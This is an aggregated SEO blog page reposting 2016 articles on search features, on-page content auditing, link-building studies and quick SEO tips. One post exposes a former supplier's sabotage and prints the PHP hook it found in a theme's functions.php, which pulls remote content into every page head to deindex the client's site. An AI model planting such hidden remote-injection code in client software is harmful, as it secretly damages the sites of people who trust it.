Innovate not imitate!

Innovate not imitate!
Interested in the latest Growth hacks?

Welcome to our blog

Interested in the latest Growth hacks?

Welcome to our blog!

We want to help you start/manage and grow your business using innovative strategies and implementation. We have a passion for helping businesses and companies of various sizes see the same success that we have achieved.

Our skillsets are wide and varied, from business strategy, marketing, to online strategy. An increasing number of companies are turning to the internet and online media as a means to maximising their marketing reach and exposure. This is special area of focus for us and we do more than simple SEO strategies.

See our website for more: www.innovatetoaccelerate.com

Thursday 30 June 2016

Unruly’s Outstream Video Ad Formats Debut on The Wall Street Journal

Advertisers on The Wall Street Journal’s website can now purchase Unruly’s outstream video ad formats, which create new premium video ad inventory within WSJ.com’s article pages. Unruly’s premium outstream video format begins to play only when the video is in-view, as defined by the Media Ratings Council (MRC). Measured by Moat, the format is designed […]

The post Unruly’s Outstream Video Ad Formats Debut on The Wall Street Journal appeared first on The SEM Post.



from The SEM Post http://ift.tt/2936dnf
http://ift.tt/eA8V8J via IFTTT

Why you may need to be aware of booby traps when hiring a new SEO

The online marketing world can be somewhat of a wild west in many regards, with SEO at the center of the chaos.

Of the thousands of providers across Australia there are no shortages of promises, case studies and packages available for every business size. The central premise of SEO is that you will get long-term sustained traffic for your investment.

The industry as a whole has a simple paradox that it must deal with, if they do their job properly, they are theoretically not needed anymore, and then stand to lose a customer. Meanwhile, if they do not do their job properly they are guaranteed to lose a customer.

Within 24 hours of one of my SEO clients deciding they were happy enough with their rankings and deciding to pull out of their retainer, one of my other clients had finally finished their 12-month web design and SEO package with their initial provider.

As I was asking myself “how can I adapt my business to allow for sudden client satisfaction,” my other clients were in the process of having their site migrated to my server.

I arrived at my client’s office to begin a day’s work, and we checked the rankings for their site. The migration had been completed a few days prior and had gone through smoothly.

That abysmal feeling of dread came, as we saw that the site couldn’t be found nestled in its top positions for any of it’s search terms anymore.

The weird thing, as I checked for manual penalties or de-indexation by searching site:example.com, it became apparent that not every page had been dropped. Only the homepage so far.

This at least narrowed the search down, and meant that I could check the source code for the homepage, and see if there was anything odd going on.

Sure enough, there it was:

<meta name= “robots” content=”noindex,follow”/>

This line of code tells Google and other search engines to remove the website from their index, rendering it unfindable. It has its time and place in day-to-day web design and marketing, but clearly does not belong on the homepage of a website that is trying to gain traffic and potential customers.

I decided to fix the problem first and then later deal with the lingering question of ‘why has this code suddenly turned up?’

Once the hunt had begun for where exactly this code was generating from, I became less and less convinced that this was some sort of accident.

Searching within any of the website files for ‘noindex’ turned up nothing, almost like the code wasn’t actually in there anywhere. Even downloading the entire set of website files and running them through a dedicated file searching tool, we couldn’t find a single instance of ‘noindex’ anywhere within the website.

Sure enough though, the noindex code was in there somewhere, and not just the front page it would seem. Google had dropped the front page but had not yet gotten around to deindexing the rest of the pages, even though every page had the code.

The webhosting company that oversaw the migration assured me that they had simply taken the site files and placed them on a server, never touching any of the code. They joined the hunt.

We eventually discovered the source of the code; it was both ingenious and simple.

I received an email from the developer in charge of migrating the site:

We have looked through the code and found the following lines in the themes functions.php file…

add_action(‘wp_head’,’sidebar_config’, 1, 3);
function sidebar_config()
{
$output = file_get_contents(‘http://robots.clients.(*previous suppliers domain*).com.au/’);
echo $output;
}

Disabling only these has resulted in the nofollow,noindex disappearing.

Note that this specifically references to connect to and retrieve a file from robots.clients.(*previous suppliers domain*).com.au and then output the code into your site.”

As I spoke with the developer, he informed me, that this code is only triggered if the site is no longer being hosted on the previous supplier’s website.

The previous suppliers dismissed it as a mistake, initially trying to tell me that it must have happened during the migration, and then later saying that they may have accidentally left the code in there, who knows.

One thing is for sure, these guys who have been in business much longer than I have, know their game well.

When a client drops me, I ask myself “what could I have done to keep them happier?” and “should I perhaps package my services better?”

When a client drops them, their entire site gets deindexed.

I think I prefer the soul-searching quest to provide value that people don’t walk away from, rather than the vindictive attempt to hedge a sites rankings to my server.



from SEO – Search Engine Watch http://ift.tt/29hVxEx
via IFTTT

How are beacons going to affect search marketing?

Recently I’ve been reading a lot about the effects beacons and proximity marketing may have on search strategy.

(I actually work for a company that makes beacons and management software, so it’s not just me being boring).

I’ve found little doubt that it will bring some very fundamental changes to the way we reach customers, and the type of targeting and data management we’ll need to master in order to do things properly.

Although perhaps not in the way you might think…

edgelands barbican

Improving proximity results

Search Engine Watch has spoken about beacons a lot in the past, but just in case you need a refresher, a beacon is a tiny device that can transmit a signal to any Bluetooth device in range – phones, fitness bracelets, headphones, smartwatches etc.

Usually this happens through an app (although Google in particular are taking steps to remove this friction and enable direct device communication), and before the privacy police wade in, it’s all completely opt-in.

It certainly has some obvious ramifications for local search.

beacon

In the past, we’ve largely been limited to areas defined by map coordinates for localisation. These are fine for locating buildings, but not so hot once people actually enter a space.

Beacons have a big advantage here because they get that location down to an area a couple of metres across, and they allow you to transmit and receive data in realtime. If I’m standing by the apples in your supermarket, you can fire me a coupon.

I’m using that example on purpose by the way, and I’ll explain why in a moment.

Beacons don’t need to be interruptive

For marketers, there seems to be an assumption that beacons are an interruptive marketing tool.

Retail couponing is the most obvious use-case after all, but just as early ecommerce sites learned, couponing is no way to build a successful business. And as the publishing industry is learning, interruptive marketing… just isn’t very good really. People don’t like it in most cases.

As I say though, this is only an assumption. The real value of beacons is actually almost the complete opposite of interruptive.

It is in contextual interactions, which usually rely on either an active request from a user, or passive scanning and data aggregation by the person deploying the beacons.

In other words, if I visit a museum, download it’s app and enable push notifications while I’m there, then I’m actively searching for information abut my location.

If not, then I can still be monitored as an anonymous device that is moving around the museum. Once this data is collected, there is a lot of potential value. Maybe it’s time to move that Rodin statue to a more prominent position (possibly next to the gift shop).

Search will need to become hyper-relevant in an open beacon marketplace

So what does this mean for search?

Currently, a lot of local search isn’t that great. There are plenty of fine examples, but there is certainly an adoption curve, particularly for small businesses.

Do a quick search for something like ‘Bike shop, Shrewsbury’ and you can usually see which businesses have a lot of low-hanging SEO fruit that they just aren’t optimising for.

This is a missed chance, but it is usually being missed because of a lack of familiarity and time. People who are busy running a hardware store don’t often have time or money to really concentrate on good SEO.

As beacon deployment becomes more widespread (and it is going to be), this situation is going to change for the user on the ground. App networks and beacons deployed as general infrastructure in more locations mean that local optimisation is opened up to more players, with more resources. Why should our local bike store be wasting time optimising when Raleigh can be doing it for them?

Local SEO will begin to be a wider concern not for the locations themselves, but for the companies that sell through those locations. And those companies have the resources and processes available to start doing a really good job.

There is however, still a place for the location itself in all this, and that is in adding contextual value, which may not come from purely commercial campaigns.

Recently I visited Edgelands at the Barbican in London, where one of our clients has deployed beacons that guide visitors around the interesting (and slightly confusing) internal space.

The interesting thing here is that it occurs through sound, so that visitors are able to view their surroundings, rather than keeping their eyes glued to their phone screens. It adds context while keeping the visitor engaged with the physical space, rather than having the two vie for attention.

With the rise of experience stores, this is going to become a more important point of differentiation over the next few years. Customers won’t want distracting alerts and pop-ups, they’ll want something that provides a richer experience.

From the marketing side, providing these will become a way to deepen brand affinity as much as increase immediate sales.

Search is about to leave its silos behind

This makes location a strange, mixed bag for search. On one side, brands providing advertising through app networks and beacon fleets owned by third parties (in my opinion, telcos are currently best placed to handle and benefit from large scale deployment, as they already have large data networks and physical locations).

In many cases, this will be about hyper-localised PPC campaigns. On the other, locations providing realtime SEO, with a shifting set of keywords based on whatever is currently happening in-store (or in-museum, or in-restaurant for instance).

It means that we’ll have to get better at aligning our data and working out which signals really matter, and we’re going to need to get insanely good at management and targeting.

I hate to use this word, but search will need to become more holistic, and even more aligned with marketing. There’s a huge opportunity here for search marketers, customer experience, data management and more.



from SEO – Search Engine Watch http://ift.tt/2959asB
via IFTTT

Google Displaying Data from Tables in Regular Search Results

We have seen many cases where Google will show tables in featured snippets in the search results.  And some types of structured data have the appearance of tables when Google displays it in the search results, such as event listings.  But now Google is pulling information from tables to show in the search results. Here […]

The post Google Displaying Data from Tables in Regular Search Results appeared first on The SEM Post.



from The SEM Post http://ift.tt/29djFcj
http://ift.tt/eA8V8J via IFTTT

Google Testing Speed Test in Search Results; Bing’s Version Active

Google is testing a new internet speed test that displays right in the search results.  And Bing announced that they already include a speed test in their own search results. Dr. Pete Meyers of Mozcast fame spotted the Google test, although he wasn’t able to replicate it. Looks like Google is testing their own internet […]

The post Google Testing Speed Test in Search Results; Bing’s Version Active appeared first on The SEM Post.



from The SEM Post http://ift.tt/2986XK9
http://ift.tt/eA8V8J via IFTTT

The Functional Content Masterplan – Own the Knowledge Graph Goldrush with this On-Page Plan

Posted by SimonPenson

[Estimated read time: 17 minutes]

On-page content is certainly not one of the sexier topics in digital marketing.

Lost in the flashing lights of "cool digital marketing trends" and things to be seen talking about, it's become the poor relative of many a hyped "game-changer."

I’m here to argue that, in being distracted by the topics that may be more "cutting-edge," we're leaving our most valuable assets unloved and at the mercy of underperformance.

This post is designed not only to make it clear what good on-page content looks like, but also how you should go about prioritizing which pages to tackle first based on commercial opportunity, creating truly customer-focused on-page experiences.

What is "static" or "functional" content?

So how am I defining static/functional content, and why is it so important to nurture in 2016? The answer lies in the recent refocus on audience-centric marketing and Google’s development of the Knowledge Graph.

Whether you call your on-page content "functional," "static," or simply "on-page" content, they're all flavors of the same thing: content that sits on key landing pages. These may be category pages or other key conversion pages. The text is designed to help Google understand the relevance of the page and/or help customers with their buying decisions.

Functional content has other uses as well, but today we're focusing on its use as a customer-focused conversion enhancement and discovery tactic.

And while several years ago it would have been produced simply to aid a relatively immature Google to "find" and "understand," the focus is now squarely back on creating valuable user experiences for your targeted audience.

Google’s ability to better understand and measure what "quality content" really looks like — alongside an overall increase in web usage and ease-of-use expectation among audiences — has made key page investment as critical to success on many levels.

We should now be looking to craft on-page content to improve conversion, search visibility, user experience, and relevance — and yes, even as a technique to steal Knowledge Graph real estate.

The question, however, is "how do I even begin to tackle that mountain?"

Auditing what you have

For those with large sites, the task of even beginning to understand where to start with your static content improvement program can be daunting. Even if you have a small site of a couple of hundred pages, the thought of writing content for all of them can be enough to put you off even starting.

As with any project, the key is gathering the data to inform your decision-making before simply "starting." That’s where my latest process can help.

Introducing COAT: The Content Optimization and Auditing Tool

To help the process along, we’ve been using a tool internally for months — for the first time today, there's now a version that anyone can use.

This link will take you to the new Content Optimisation and Auditing Tool (COAT), and below I’ll walk through exactly how we use it to understand the current site and prioritize areas for content improvement. I'll also walk you through the manual step-by-step process, should you wish to take the scenic route.

The manual process

If you enjoy taking the long road — maybe you feel an extra sense of achievement in doing so — then let's take a look at how to pull the data together to make data-informed decisions around your functional content.

As with any solid piece of analysis, we begin with an empty Excel doc and, in this case, a list of keywords you feel are relevant to and important for your business and site.

In this example, we'll take a couple of keywords and our own site:

Keywords:

Content Marketing Agency
Digital PR

Site:

http://ift.tt/10MOZUy

Running this process manually is labor-intensive (hence the need to automate it!) and to add dozens more keywords creates a lot of work for little extra knowledge gain, but by focusing on a couple you can see how to build the fuller picture.

Stage one

We start by adding our keywords to our spreadsheet alongside a capture of the search volume for those terms and the actual URL ranking, as shown below (NOTE: all data is for google.co.uk).

Next we add in ranking position...

We then look to the page itself and give each of the key on-page elements a score based on our understanding of best practice. If you want to be really smart, you can score the most important factors out of 20 and those lesser points out of 10.

In building our COAT tool to enable this to be carried out at scale across sites with thousands of pages, we made a list of many of the key on-page factors we know to affect rank and indeed conversion. They include:

  • URL optimization
  • Title tag optimization and clickability
  • Meta description optimization and clickability
  • H1, H2, and H3 optimization and clickability (as individual scores)
  • Occurences of keyword phrases within body copy
  • Word count
  • Keyword density
  • Readability (as measured by the Flesch-Kincaid readability score)

This is far from an exhaustive list, but it's a great place to start your analysis. The example below shows an element of this scored:

Once you have calculated score for every key factor, your job is to then to turn this into an average, weighted score out of 100. In this case, you can see I've done this across the listed factors and have a final score for each keyword and URL:

Stage two

Once you have score for a larger number of pages and keywords, it's then possible to begin organizing your data in a way that helps prioritise action.

You can do this simply enough by using filters and organising the table by any number of combinations.

You may want to sort by highest search volume and then by those pages ranking between, say, 5th and 10th position.

Doing this enables you to focus on the pages that may yield the most potential traffic increase from Google, if that is indeed your aim.

Working this way makes it much easier to work in a way that delivers the largest positive net impact fastest.

Doing it at scale

Of course, if you have a large site with tens (or even hundreds) of thousands of pages, the manual option is almost impossible — which is why we scratched our heads and looked for a more effective option. The result was the creation of our Content Auditing and Optimisation Tool. Here's how you can make use of it to paint a fuller picture of your entire site.

Here's how it works

When it comes to using COAT, you follow a basic process:

  • Head over to the tool.
  • Enter your domain, or a sub-directory of the site if you'd like to focus on a particular section
  • Add the keywords you want to analyze in a comma-separated list
  • Click "Get Report," making sure you've chosen the right country

Next comes the smart bit: by adding target keywords to the system before it crawls, it enables the algorithm to cross-reference all pages against those phrases and then score each combination against a list of critical attributes you'd expect the "perfect page" to have.

Let’s take an example:

You run a site that sells laptops. You enter a URL for a specific model, such as /apple-15in-macbook/, and a bunch of related keywords, such as "Apple 15-inch MacBook" and "Apple MacBook Pro."

The system works out the best page for those terms and measures the existing content against a large number of known ranking signals and measures, covering everything from title tags and H1s to readability tests such as the Flesch-Kincaid system.

This outputs a spreadsheet that scores each URL or even categories of URLs (to allow you to see how well-optimized the site is generally for a specific area of business, such as Apple laptops), enabling you to sort the data, discover the pages most in need of improvement, and identify where content gaps may exist.

In a nutshell, it'll provide:

  • What the most relevant target page for each keyword is
  • How well-optimized individual pages are for their target keywords
  • Where content gaps exist within the site’s functional content

It also presents the top-level data in an actionable way. An example of the report landing page can be seen below (raw CSV downloads are also available — more on that in a moment).

You can see the overall page score and simple ways to improve it. This is for our "Digital PR" keyword:

The output

As we've already covered in the manual process example, in addition to pulling the "content quality scores" for each URL, you can also take the data to the next level by adding in other data sources to the mix.

The standard CSV download includes data such as keyword, URL, and scores for the key elements (such as H1, meta, canonical use and static content quality).

This level of detail makes it possible to create a priority order for fixes based on lowest-scoring pages easily enough, but there are ways you can supercharge this process even more.

The first thing to do is run a simple rankings check using your favorite rank tracker for those keywords and add them into a new column in your CSV. It'll look a little like this (I've added some basic styling for clarity):

I also try to group keywords by adding a third column using a handful of grouped terms. In this example, you can see I'm grouping car model keywords with brand terms manually.

Below, you'll see how we can then group these terms together in an averaged cluster table to give us a better understanding of where the keyword volume might be from a car brand perspective. I've blurred the keyword grouping column here to protect existing client strategy data.

As you can see from the snapshot above, we now have a spreadsheet with keyword, keyword group, search volume, URL, rank, and the overall content score pulled in from the base Excel sheet we have worked through. From this, we can do some clever chart visualization to help us understand the data.

Visualizing the numbers

To really understand where the opportunity lies and to take this process past a simple I’ll-work-on-the-worst-pages-first approach, we need to bring it to life.

This means turning our table into a chart. We'll utilize the chart functionality within Excel itself.

Here's an example of the corresponding chart for the table shown above, showing performance by category and ranking correlation. We're using dummy data here, but you can look at the overall optimization score for each car brand section alongside how well they rank (the purple line is average rank for that category):

If we focus on the chart above, we can begin to see a pattern between those categories that are better optimized and generally have better rankings. Correlation does not always equal causation, as we know, but it's useful information.

Take the very first column, or the Subaru category. We can see that it's one of the better-optimized categories (at 49%) and average rank is at 34.1. Now, these are hardly record-breaking positions, but it does point towards the value of well-worked static pages.

Making the categories as granular as possible can be very valuable here, as you can quickly build up a focused picture of where to put your effort to move the needle quickly. The process for doing so is an entirely subjective one, often based on your knowledge of your industry or your site information architecture.

Add keyword volume data into the mix and you know exactly where to build your static content creation to-do list.

Adding in context

Like any data set, however, it requires a level of benchmarking and context to give you the fullest picture possible before you commit time and effort to the content improvement process.

It’s for this reason that I always look to run the same process on key competitors, too. An example of the resulting comparison charts can be seen below.

The process is relatively straightforward: take an average of all the individual URL content scores, which will give you a "whole domain" score. Add competitors by repeating the process for their domain.

You can take a more granular view manually by following the same process for the grouped keywords and tabulating the result. Below, we can see how our domain sizes up against those same two competitors for all nine of our example keyword groups, such as the car brands example we looked at earlier.

With that benchmark data in place, you can move on to the proactive improvement part of the process.

The perfect page structure

Having identified your priority pages, the next step is to ensure you edit (or create them) in the right way to maximize impact.

Whereas a few years ago it was all about creating a few paragraphs almost solely for the sake of helping Google understand the page, now we MUST be focused on usability and improving the experience for the right visitor.

This means adding value to the page. To do that, you need to stand back and really focus in on the visitor: how they get to the page and what they expect from it.

This will almost always involve what I call "making the visitor smarter": creating content that ensures they make better and more informed buying decisions.

To do that requires a structured approach to delivering key information succinctly and in a way that enhances — rather than hinders — the user journey.

The best way of working through what that should look like is to share a few examples of those doing it well:

1. Tredz Top 5 Reviews

Tredz is a UK cycling ecommerce business. They do a great job of understanding what their audience is looking for and ensuring they're set up to make them smarter. The "Top 5" pages are certainly not classic landing pages, but they're brilliant examples of how you can sell and add value at the same time.

Below is the page for the "Top 5 hybrids for under £500." You can clearly see how the URL (http://ift.tt/29eH2DW), meta, H tags, and body copy all support this focus and are consistently aligned:

2. Read it for me

This is a really cool business concept and they also do great landing pages. You get three clear reasons to try them out — presented clearly and utilizing several different content types — all in one package.

3. On Stride Financial

Finance may not be where you'd expect to see amazing landing pages, but this is a great example. Not only is it an easy-to-use experience, it answers all the user's key questions succinctly, starting with "What is an installment loan?" It's also structured in a way to capture Knowledge Graph opportunity — something we'll come to shortly.

Outside of examples like these and supporting content, you should be aiming to

create impactful headlines, testimonials (where appropriate), directional cues (so it's clear where to "go next"), and high-quality images to reflect the quality of your product or services.

Claiming Knowledge Graph

There is, of course, one final reason to work hard on your static pages. That reason? To claim a massively important piece of digital real estate: Google Featured Snippets.

Snippets form part of the wider Knowledge Graph, the tangible visualization of Google’s semantic search knowledge base that's designed to better understand the associations and entities behind words, phrases, and descriptions of things.

The Knowledge Graph comes in a multitude of formats, but one of the most valuable (and attainable from a commercial perspective) is the Featured Snippet, which sits at the top of the organic SERP. An example can be seen below from a search for "How do I register to vote" in google.co.uk:

In recent months, Zazzle Media has done a lot of work on landing page design to capture featured snippets with some interesting findings, most notably the level of extra traffic such a position can achieve.

Having now measured dozens of these snippets, we see an average of 15–20% extra traffic from them versus a traditional position 1. That’s a definite bonus, and makes the task of claiming them extremely worthwhile.

You don’t have to be first

The best news? You don’t even have to be in first position to be considered for a snippet. Our own research shows us that almost 75% of the examples we track have been claimed by pages ranked between 2nd and 10th position. It's far from being robust enough yet for us to formalize a full report on it, but early indication across more than 900 claimed snippets (heavily weighted to the finance sector at present) support these early findings.

Similar research by search data specialists STAT has also supported this theory, revealing that objective words are more likely to appear. General question and definition words (like "does," "cause," and "definition") as well as financial words (like "salary," "average," and "cost") are likely to trigger a featured snippet. Conversely, the word "best" triggered zero featured snippets in over 20,000 instances.

This suggests that writing in a factual way is more likely to help you claim featured results.

Measuring what you already have

Before you run into this two-footed, you must first audit what you may (or may not) already have. If you run a larger site, you may already have claimed a few snippets by chance, and with any major project it's important to benchmark before you begin.

Luckily, there are a handful of tools out there to help you discover what you already rank for. My favorite is SEMrush.

The paid-for tool makes it easy to find out if you rank for any featured snippets already. I'd suggest using it to benchmark and then measure the effect of any optimization and content reworking you do as a result of the auditing process.

Claiming Featured Snippets

Claiming your own Featured Snippet then requires a focus on content structure and on answering key questions in a logical order. This also means paying close attention to on-page HTML structure to ensure that Google can easily and cleanly pick out specific answers.

Let’s look at a few examples showing that Google can pick up different types of content for different types of questions.

1. The list

One of the most prevalent examples of Featured Snippets is the list.

As you can see, Media Temple has claimed this incredibly visual piece of real estate simply by creating an article with a well-structured, step-by-step guide to answer the question:

"How do I set up an email account on my iPhone?"

If we look at how the page is formatted, we can see that the URL matches the search almost exactly, while the H1 tag serves to reinforce the relevance still further.

As we scroll down we find a user-friendly approach to the content, with short sentences and paragraphs broken up succinctly into sections.

This allows Google to quickly understand relevance and extract the most useful information to present in search; in this case, the step-by-step how-to process to complete the task.

Here are the first few paragraphs of the article, highlighting key structural elements. Below this is the list itself that's captured in the above Featured Snippet:

2. The table

Google LOVES to present tables; clearly there's something about the logical nature of how the data is presented that resonates with its team of left-brained engineers!

In the example below, we see a site listing countries by size. Historically, this page may well not have ranked so highly (it isn’t usually the page in position one that claims the snippet result). Because of the ways it has structured the information so well, however, Geohive will be enjoying a sizable spike in traffic to the page.

The page itself looks like this — clear, concise and well-structured:

3. The definition

The final example is the description, or definition snippet; it's possibly the hardest to claim consistently.

It's difficult for two key reasons:

  • There will be lots of competition for the space and answering the search query in prose format.
  • It requires a focus on HTML structure and brilliantly crafted content to win.

In the example below, we can see a very good example of how you should be structuring content pages.

We start with a perfect URL (/what-is-a-mortgage-broker/) and this follows through to the H1 (What is a Mortgage Broker). The author then cleverly uses subheadings to extend the rest of the post into a thorough piece on the subject area. Subheadings include the key How, What, Where, and When areas of focus that any good journalism tutor will lecture you on using in any good article or story. Examples might include
  • So how does this whole mortgage broker thing work?
  • Mortgage brokers can shop the rate for you
  • Mortgage brokers are your loan guide
  • Mortgage broker FAQ

The result is a piece that leaves no stone unturned. Because of this, it's been shared plenty of times — a sure fire signal that the article is positively viewed by readers.

Featured Snippet Cheatsheet

Not being one to leave you alone to figure this out though, I have created this simple Featured Snippet Cheatsheet, designed to take the guesswork out of creating pages worthy of being selected for the Knowledge Graph.

Do it today!

Thanks for making it this far. My one hope is for you to go off and put this plan into action for your own site. Doing so will quickly transform your approach to both landing pages and to your ongoing content creation plan (but that’s a post for another day!).

And if you do have a go, remember to use the free COAT tool and guides associated with this article to make the process as simple as possible.

Content Optimization and Auditing Tool: Click to access


Sign up for The Moz Top 10, a semimonthly mailer updating you on the top ten hottest pieces of SEO news, tips, and rad links uncovered by the Moz team. Think of it as your exclusive digest of stuff you don't have time to hunt down but want to read!



from The Moz Blog http://ift.tt/296XfeL
via IFTTT

Wednesday 29 June 2016

Which kinds of links are most valuable for high rankings?

What does link-building look like right now? What tactics work? Is it all about quality content or do more shady tactics still get results? 

Glen Allsop of ViperChill posted another excellent article recently, distilling the findings from his own manual analysis of 1,000 search results.

He looks at the link structure of various sites, trying to ascertain the kinds of links that help some sites rank, the tactics (white hat and not-so white hat) used by sites to rank, and the effects of factors like number of links and word count.

It’s a monster of a post – more than 5,000 words I’d guess – but truly worth a read. All I’ll do here is list some of the key lessons from Glen’s analysis.

The most common backlinks are natural

Glen found that natural (i.e. earned) backlinks top the chart, which is as it should be.

prominent backlink types viperchill

However, the study also found that many high ranking websites have some very low quality backlinks. They are things like forum pages, blog comments, and non-English Blogspot blogs. They’re not earned, but can be easily created.

Indeed, a recent look at Skyscanner’s impressive search rankings revealed something similar. There are quality links there, but plenty which could be classed as ‘low-quality’. Perhaps these are the result of older link building efforts, who knows?

Link volume does not influence ranking

It’s about quality not quantity. As this chart shows, the volume of backlinks does not correlate with ranking.

backlinks number

Variety of linking domains helps

Obvious perhaps, but good to reinforce. A variety of links from different domains matters much more than volume.

referring

Longer content and high rankings

There have been a few studies suggesting a correlation between longer form content and higher search rankings.

It makes sense, as in theory, longer content can be more likely to satisfy the user (it’s detailed, covers key questions etc), and in turn more likely to attract links.

Glen’s data backs this point up. The average word count on all results was 1,762, and higher counts tended to correlate with higher rankings.

word-count-1 (1)

Link building tactics that still work

A few weeks ago, we talked about another finding around sitewide footer links used by some sites, and how tactics like this help the ‘rich get richer’ in search (this was another finding from ViperChill).

In this article, Glen looks at how Houzz uses a widget to  mbed dozens of hard-coded links in the websites of those who host it. It seems this tactic is still in use.

Good content still works

Writing quality content to attract links is still an excellent tactic. Evergreen content is key to this.

The example used here is a beginners guide to the Paleo diet, from the nerdfitness blog. It has attracted links from 800 domains and continues to deliver traffic to this day.

paleo diet

Why does it still attract links? Four reasons:

  • High ranking. It’s up there right now, so when people look for resources to link to, there it is.
  • It’s a good article. It’s there because it serves a need. It’s also comprehensive which means people don’t need to look elsewhere.
  • Internal links. The sidebar on the homepage links to the post so it continues to accrue traffic.
  • Loyal audience. The site has an engaged audience who appreciate and link to the content.

Dodgy tactics can still work

There are still plenty of dubious tactics that are helping websites achieve high rankings.

For example, this .info site has 195,000 links from 242 domains, that’s more than 800 per domain. I’m ‘sure’ they’re all earned, natural links though…

refer

The study found less private blog networks than expected, but also finds that they still work.

In summary

I’ve only scratched the surface of the study here, so please check out the full article for much more. It is itself a great example of creating quality (and long-form) content that attracts links. I’m sure we won’t be the only site linking to it.



from SEO – Search Engine Watch http://ift.tt/29oMbFL
via IFTTT

Nine SEO techniques that take less than 15 minutes

I know. It’s the 21st century equivalent of ‘8 minute abs’. But bear with me on this…

Search engine optimisation should be an ongoing process, mixing technical on-page techniques with quality content, good old fashioned marketing, plenty of research, tonnes of planning, masses of testing and all the while taking into account searcher intent, context, algorithm changes… I get breathless just thinking about all the work that needs doing…

Basically, SEO is a job that is never done.

But, if you are struggling with time and resources, there are SEO techniques that don’t have to consume your entire day.

The following can be done while sat down in the morning, enjoying a pastry, listening to some cool light-jazz and blissfully remembering that this is a much better use of your time than that other ‘resolution’ you toyed with doing four paragraphs ago.

Please note: we published a similarly titled guide to quick SEO tips, written by Josh McCoy, way back in 2012. This is an updated, rewritten version that reflects the subsequent changes and updates to the search landscape.

1. Check your site’s organic CTR, revise 10 of the lowest performing page’s title tags and meta descriptions

Head into your site’s Google Search Console, then click on Search Traffic>Search Analytics.

Search Console Search Analytics

Then click on the Impressions and CTR filters for Pages.

Here you can take a look at the pages with high visibility, but low CTR. Perhaps all they need is an improved meta description or title tag?

For a more detailed overview, check out How to improve CTR using Search Console.

2. Add Schema markup to your 10 most popular pages

You can add rich media to your search results by adding Schema markup to the HTML of your pages.

captain america civil war review rich snippet

If you have a particularly massive site with years and years worth of posts, the idea of adding rich snippets to your pages can seem terrifying. Instead, make a spreadsheet of your most popular posts, then every day go through 10 of them and implement schema markup. This should help gradually improve the CTR of your results.

3. Improve your site speed by optimising images

Site speed is a hugely important ranking signal, and you can check your site’s loading time on both mobile and desktop with this new site speed tool.

Obviously improving the performance of your site is a complicated job best saved for the tech team, but you can help…

Images are are by far the ‘heaviest’ element when it comes to page load. So why not spend a few minutes working back through your most popular posts and making your image file sizes smaller.

For example, if there’s an image on your page that’s 1024 x 683 pixels, but the user only sees it at a maximum of 420 x 289, you could ease the strain on your page by compressing the file size with very little noticeable difference.

Read this article for full details: How to optimise your page images to increase site speed.

4. Check the proper canonicalization of your domain

Are you aware that your site may exist in two different places? Without even knowing it, Google could be indexing your content from both www.example.com and example.com and therefore you may be cannibalising your own pages in search.

Luckily it doesn’t take very long to fix this problem.

You just have to tell Google which is the preferred version of your domain for all future crawls of your site and indexing refreshes.

As it states on their webmaster help page:

If you specify your preferred domain as http://www.example.com and we find a link to your site that is formatted as http://example.com, we follow that link as http://www.example.com instead. In addition, we’ll take your preference into account when displaying the URLs.

To change this, visit Search Console, click on your site, click the gear icon then click Site Settings. And in the Preferred domain section, select the option you want.

5. Verify your Google My Business page, make sure your details are up to date

Kevin Gibbons wrote some good suggestions for us when it comes to optimising your page for local search:

  • Claim your listing, as often many people don’t.
  • Ensure your details are up-to-date (previously you might not have accepted credit cards).
  • Double check your opening hours and phone number as these often change over time or the business has new owners or management
  • Check the business images you are using and consider refreshing them or uploading higher res versions.
  • Check no-one has made an edit to your listing and changed the businesses’s website to their affiliate link, have seen this too!

There are loads more tips here: How to optimise your Google My Business listing.

6. Check that you don’t have any duplicate meta description and title tags

This is a very easy one. Just head back into Search Console, click on Search Appearance>HTML Improvements, then you can see exactly which of your pages contain duplicate metadata and you can alter accordingly.

Search Console HTML Improvements

7. Keep on top of your image alt tags

Google Image Search can drive a significant amount of traffic to your site, however you must remember that Google can’t ‘see’ your images, but it can ‘read them’.

Therefore describing your images accurately and concisely in the ‘alt text or tag’ section is very important.

Check back through your last handful of pages and make sure your images conform.

wordpress photo upload highlighting caption and description

You could even look at the alt tags at the same time as checking your image file sizes (see point 3).

For lots more information, check out How to optimise images for SEO.

8. Check your 404 error codes

404 pages occur when a Googlebot attempts to visit a page that doesn’t exist. Generally 404 pages are fine and won’t harm your rankings, but it is important to pay attention to them, especially if there’s a sudden increase.

You can check these in Search Console, under Crawl>Crawl Errors.

Then if anything looks to have been deleted accidentally, or a 301 redirect hasn’t been put in place properly, you can fix these straight away.

9. Keep on top of your internal linking

Regular and consistent internal linking to the most popular articles on your site is a key way to show search engines that your site has authority and that your content is ‘trusted’.

There are many different methods and tools to check which of your pages is the most popular for any search phrase, and therefore the ones you should be using to internally link for added SEO benefit.

Spend some time going back through your posts and ensuring that each post has a few internal links, paying particular attention to the anchor text used, and making sure they’re all relevant AND pointing towards pages you wish to see rank.

There’s an excellent, detailed best practice guide here: Internal linking for SEO.

So there you go. Nine quick things you can do to improve your SEO every day without taking up too much of your energy. Obviously this is far from an exhaustive list, but it’s definitely a start to getting the basics right.



from SEO – Search Engine Watch http://ift.tt/297vOPx
via IFTTT

Google’s Keyword Planner tool just became even more inaccurate

You’re probably familiar with the Keyword Planner tool, which is one of the best sources we have to spot opportunities and make the business case for an investment into paid or organic search campaigns.

One of the things it provides is guidance on the volume of searches for any given query. The numbers reported in the tool have always been somewhat vague. They are rounded up and numbers end with at least one zero. A pinch of salt has always been required when digesting the data.

It turns out that these numbers are now even more imprecise.

Jennifer Slegg spotted that Google has started to combine related terms, pooling them all together and reporting one (bigger) number.

No longer can you separate the data for keyword variants, such as plurals, acronyms, words with space, and words with punctuation.

As such it would be easy to get a false impression of search volumes, unless you’re aware of the change. No sudden jump in search queries, just an amalgamated number. Be warned.

Here are a couple of examples…

Bundling together anagrams and regional spellings

Screen Shot 2016-06-29 at 11.10.33

Lumping together plurals and phrases without spaces

Screen Shot 2016-06-29 at 11.08.47

The problem could be exacerbated by third party tools. Jennifer says:

“For those that don’t notice the change – or worse, pulling the data from tools that haven’t updated to take into account the change – this means that some advertisers and SEOs are grossly overestimating those numbers, since many tools will combine data, and there is no notification alert on the results to show that how Google calculates average monthly searches has been changed.”

So yeah, this isn’t exactly good news. In fact, I can’t think of any benefit to the end user, but Google has a history of obfuscating data, so perhaps it shouldn’t come as a surprise.

That said, it once again pushes the focus towards relevance and context rather than pure volume. Advertisers and content creators would do well to focus on optimising clickthrough rate and landing page performance, rather than just shotgun marketing.

